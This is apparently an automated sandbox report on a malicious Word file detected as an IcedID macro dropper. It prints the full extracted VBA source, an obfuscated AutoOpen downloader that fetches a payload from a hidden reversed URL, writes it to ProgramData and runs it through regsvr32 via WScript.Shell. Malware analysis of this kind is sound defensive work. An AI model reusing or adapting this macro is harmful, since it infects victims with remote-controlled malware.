Verdict: MALICIOUS
Risk Score: 230
Heuristics: 6

- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project — VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  Set FmGql = CreateObject("Script" + aRVnL)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  Sub AutoOpen()
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas: In document text (OOXML body / shared strings)
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11732 bytes | e9dd1196c82d54f36d529a273201f9a28297be9e3ca35a7a5be77faf6ef818e5 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qlBCv"
Sub ZoSTL(OpypT, Optional ByVal yFWyV As String = "c:\programdata\xtOuz.txt", Optional ByVal aRVnL As String = "ing.FileSystemObject")
' Dub understatement drop
' Diabetic pavings detecting shovelful dilapidation
' Pits martyr revanchist guy enjoying
' Cox aerobatic frantically
' Constitutional
' Intoning student atonal dauphin occurred
' Deadlier arbitrated lobotomised
' Mastiff bastardisation
' Enshrines pang regina sward
' Wicketkeeper egg promulgation licenses
' Breast implied hurray malt livelihoods
' Condoned magnificence islander
' Coon efface theologically diphthongs recordings
' Lauded
' Essentials nipples experimenters
' Aidedecamp held transatlantic
' Goodbye
Set FmGql = CreateObject("Script" + aRVnL)
' Swab cowgirl blanked suitable
' Rewordings brainless
' Mopes cola passed ids
' Antigens platters victimises iconographic
' Falsely stiller
Set mYHbs = FmGql.CreateTextFile(yFWyV)
' Importing scourge
' Eastbound unearthed chastely telegraph
' Crowned anechoic
' Henpeck assort
mYHbs.WriteLine OpypT
' Workload
' Marquee triffid printing fabricator
' Literacy sentenced determined callipers vainest
' Towpaths clemency her unpronounceable tartan reclined
' Bearskin tidying
mYHbs.Close
' Towpath convenience pursuit
' Brays
' Plaster significance
' Legume mall abbe jubilantly enshrined
' Disinterred fringing stammered statement
' Hayfever impolite spa
' Brawniest
' Collarless twigs
' Discontinuance scourge
' Cancers corneas afternoons attenuator mecca posts
' Uproars shafted
' Addressing eruptions fulsomely emirates wilts
' Inuit kaiser
' Destruct wrasse endoscope copywriter impeach
' Cowriter suzerainty outages cryptology
' Alts dribbles
' Parasitised extortion unacceptably idle tucked
' Petrochemical stellar
' Fijians wellmarked televised
' Unclimbed
' Recent
' Typifying shockers rightward direct
' Unscrambled gyroscopes treatment
' Preys warpaint photostat rubicon phosphoric tobogganing
' Derails communing luxurious conscientious girded
' Resonances
' Barbiturate uninitiated hullo dampest icecream
' Choose
' Motivator frazzled bumps
' Auctioneer froze reactivities
' Garble
' Flyer wherewith wettest
' Ultrasound bleakest examinations
' Coppice refineries reconquer
' Potencies colonised differentiable legacy prurience
' Controversies spectrometer notches celluloid
End Sub
' Costs fled angular hauls juridic
' Burn conjurers
' Alfatah pleaded
' Captor prosecutorial stairwells spanning innards
' Ulcer oddity sandpit uniform confection
' Following
' Reimbursing interviewing disaster existential facsimiles
Sub AutoOpen()
' Validates marinate sponger
' Liars adjuster handedness
' Jailing donors
' Slurred daughters previewing toolboxes westward
' Drummer orate forty assassination pulchritude
' Shouts parachutists unseasonal
' Harangues rissole
' Net keel prosperously
' Flare encouraged
' Mandril daemon irretrievable
' Soaking audits
' Deterioration throatiest roofing overtaken
' Impales augury
' Blenders macroeconomics vermin anniversaries
' Enthralled parched schoolboy
' Unsystematic schwa entities
' Hurdlers corks liars halite rococo motivation
' Slaloms impeaches contacted richest
' Exalted solely applaud welcomer mascots shredder
' Fends demographic engendered hardwoods
' Director fundamentals coercions ah
' Scoured unusably starting itinerant
' Preciseness rendezvoused arrangements amalgam
' Melanomas crucial
' Metaphors unattached deciles characterless
' Forks scoreline
' Splittable delving
' Bipedalism jolts dazzle
Dim pYbPc As New UqPjU
' Maligns lawmakers
' Calorie hurtle cowgirl eyeballs
' Infill hairraising pigs
' Recomputes criterion piranhas swallowing rusty
' Carnivores ladder hunkers cornflower gnarling forename
' Unfreeze scaffold treasurers cottages
OpypT = pYbPc.BRotJ("MSXML2.serverXMLHTTP")
' Tons genome
' Tracheal censored
' Chapped messy chestnut decreeing bureaucracy players
' Outgo toileting thirties
' Menfolk albany statesmanlike
' Legion hostility gallons folkart contracting
ZoSTL AzDRk(OpypT)
' Cells
' Kayak clinching planktonic
' Hydrodynamical vain dimmest radiographers
' Marching phototypesetter asunder drowsy detour skirmishes
' Procedures jumbo
' Endorsed posit synonymy
' Wavefront inhales sickens
' Pancaked overtness cohabiting lime demurred
' Decaying cat
' Bookish thirsting unions
KHQmw IPSxZ(0) + "vr32 c:\programdata\xtOuz.txt", "ws"
End Sub
Function uvSyV(luHOy, gNfaN)
' Financially relegates
' Laze inroads corded
' Bemused husbandman stationmaster crosschecking
' Takes bonanzas rotund
' Likening canisters limbless
uvSyV = Split(luHOy, gNfaN)
End Function
Attribute VB_Name = "gvXzI"
' Head sugarcoated conscripts aardvark
' Paceman
' Disbandment blinker
' Scores clipped
' Hotplates furrow heaved dismount
Function AzDRk(pLUuo)
' Snapshot nudist undertone
' Plague minim cruciform investiture respiratory
' Rewound meows
' Courtesans lumberjack
' Jurisdictions
' Exasperated wands drop unbearably decoratively
AzDRk = StrConv(pLUuo, vbUnicode)
' Museums
' Greasepaint petals pilaster craftiest effluvia
' Stuff dappled theorists hooky
' Bumblers adjournment
' Ditches tweeters strewing gem
End Function
' Virulent
' Sodomy freezer mogul millpond amulets
' Cedars unrevealing prickling
' Tactical scouting garbled splittings
' Denier predictors
' Morasses abounding hurried
' Tubeless contagion regulate
' Approval isolate reticent
Function nEDVs()
' Piecing evaluational crookedness footstep
' Naturalised conducting
' Rite polled
' Quivered multiplied juggling prognostication tropospheric
' Sprinted prolongs
' Trampled resetting
' Disestablishing lit
' Outfall greasiest
' Joyride aftershave nozzle
' Unpack bust bikes
With ActiveDocument.shapes(1)
nEDVs = .AlternativeText
End With
End Function
' Nested photographic asterisked challenged requisitioning
' Spotlessly balloting ushers tweeds dross preparedness immutably confetti
' Dosages mirages minuets unformed telephoto overrun
' Waging dieted manufacturer rescheduling experimentation
Function IPSxZ(sHfVc)
' Negotiable granular scripting unfitness molluscs
' Lexicographical exhaustive radiators hulking retests
' Cardiologist loosing
' Mail sicknesses inventiveness
' Heartiest
' Whitecollar invocations aimer unemployment
' Bookmarks fog
' Mothered nasalised numeric
' Pharmaceuticals scorches frogman pakistan
' Lithological opioids have
' Subcontractors nato affably twofaced
' Totemic
' Resurface breathing lamp peartrees meritocratic
Ydwnu = nEDVs()
bvaug = uvSyV(Ydwnu, "###")
kFwPX = bvaug(sHfVc)
IPSxZ = kFwPX
End Function
Attribute VB_Name = "UqPjU"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Interjecting characterful
' Kriegspiel colander
' Seduce rotators
' Parked twinkle growths preadolescent shimmer
' Unclouded resprayed
Function BRotJ(HfQXY)
' Schizophrenics counterpoise defies
' Reintegration homesickness reasonableness forbade
' Headroom
' Fiches uninvented french orphan
' Salsa scarf
' Reachieved phylogeny reanimating
Dim ZoIiK As Object
' Decks newts expulsion
' Unfulfilled
' Exotically respectability
' Aggravating crunchier heterodoxy palmy
' Routinely guilder scenery
' Rearrange dubbed giftware nutty atrociously whip
' During philologist moistened
' Frustum deepfried cutest intimately
' Boxing collagen warheads
' Charmless
' Wheelie interim weirdest packet
Set ZoIiK = CreateObject(HfQXY)
' Childminders jumping warmth
' Unlace greened aluminum
' Powersharing spaces marshmallow handling
' Suites withers
' Emulsifies multiprocessing pestering
' Suitor
' Changer levitated crumpling reproof midfielders
' Amethysts
' Uncoils ho smooth daddy rowdy
' Wintriest siphons
' Penance backfires
' Wastefully conquests pallor sonic morphogenesis
' Antiquated
' Lards binocular coarsest
' Externalised chlorinated chassis
' Tipster
' Overseen brokerage nerd exiles
' Manoeuvrings
' Misting chessmen
' Abuser cardholders
' Bookends
' Reach
' Candidatures irretrievably camber
' Equivocal intense fro boats marketeer duplication
' Sanitised bother centennial
irjSZ = IPSxZ(1)
' Crinkled
' Besetting compendiums sweetening
' Committing
' Falsifier joyfulness imaginary matte peckers epochs
' Principle firs versed censure
' Diplexers steppe
ZoIiK.Open "GET", Reverse(irjSZ), False
' Mafiosi
' Highlight unmemorable renewal
' Winner torpedo barrage sparsely wellmeaning
' Jailbird inhospitable polymerised guessing
' Singing kettle minty pudding
ZoIiK.Send
' Truest vary heeled conservationist brit oddness
' Tonguetwister altarpieces
' Bolsters received gerundive conjurer taboo
' Paragraphs foamier augmentations goodhumouredly
' Lagune pantaloons lawmakers extinctions
' Commandeer mush
BRotJ = ZoIiK.responsebody
End Function
Attribute VB_Name = "GgTNR"
Sub KHQmw(unton, aENZm)
' Ganglia immutable tonality soapbox
' Carbolic mortgages automatically razzmatazz
' Manageability rectory gimmick warlord
' Yon winds etch brushwood
' Gilt standardised hikes scrums
' Generating
Set QVNOo = CreateObject(aENZm + "cript.shell")
' Mishitting skullduggery earmark
' Leans curliness exasperation pinning slimmed judgments
' Approves quadrupeds blinks
' Hoards
' Songs counts inbred
' Telegraphic augers fixated
' Statical giraffe commercialised
' Briefed emphatic segmental warmest precursor
' Concerto mimetic
' Extruded wetness
' Unattenuated unimagined unemotional bart
' Java later
' Rhyming forgot threats slings prudishness
' Promotions perchance flared suspends
' Razors billionaires
' Duodenal adaptive consortium encamp exhaustively eminently stupefying
' Upstream prayer
' Hastens replicating situational
' Haversack feebler taverns
' Retaliates verticality sprightlier grind
' Graduations reroutes
' Kindest
' Reassured nauseousness
' Steers mousses pounced fourteenth sustains
' Imbued
' Centrifuges unbarred exemplification laminated
' Cuds uncollected
' Stewardess vivacity poodles suppliant
' Incapacitating coronets
' Ferromagnetic junkies periphrastic uncrackable
' Colonists preferentially
' Performances seared gritting
' Praise disillusionment
' Liturgies idealistic summertime spews
' Burbled querulous coherent aerodynamics abattoir
' Revivals extensibility
' Atoll debating bemuse enamoured
' Seismological uplinks
' Consort polymorphisms
' Innovated filter ecclesiastical
' Contextually kaleidoscope assume
' Ideologists superciliously yens
' Peeps affectionately coiffure counterfeit elaborating
' Dreadfulness genially
' Sojourn amplifications brasiers terribly pityingly penumbra
' Communicativeness centralise excitedly forsworn scouting
QVNOo.exec unton
' Imbibe shades
' Kites sweepers
' Doggedly
' Florida renamed negated homozygous
' Editorships purl unrequited
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 44032 bytes | aaf0781635a21ccba0ad8f1c944f19a4142ba8e2f252b9925aaa5b3737ee2f19 |

Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely